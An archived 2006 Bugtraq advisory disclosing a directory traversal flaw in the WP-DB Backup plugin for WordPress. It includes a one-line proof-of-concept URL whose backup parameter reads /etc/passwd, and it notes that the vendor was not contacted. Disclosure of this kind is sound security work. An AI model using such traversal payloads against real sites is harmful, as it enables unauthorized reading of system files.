lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <371f567e0608140136q6163a47dse298046f480cace3@mail.gmail.com> Date: Mon, 14 Aug 2006 10:36:03 +0200 From: ss_team <ssteam.pl@...il.com> To: bugtraq@...urityfocus.com Subject: Wordpress WP-DB Backup Plugin Directory Traversal Vulnerability Hi all, Software: WP-DB Backup Plugin for Wordpress Homepage: http://www.skippy.net/blog/category/wordpress/plugins/wp-db-backup/ Description: WP-DB Backup is vulnerable to directory traversal attack. You must have administrator rights in the wordpress blog to exploit this vulnerability. PoC: http://path-to-wordpress/wp-admin/edit.php?page=wp-db-backup.php&backup=../../../../../etc/passwd Credits: marc & shb from ssteam are credited with discoverying this vulnerability. Vendor: not contacted. -- Coolest IT security blog: http://ssteam.ath.cx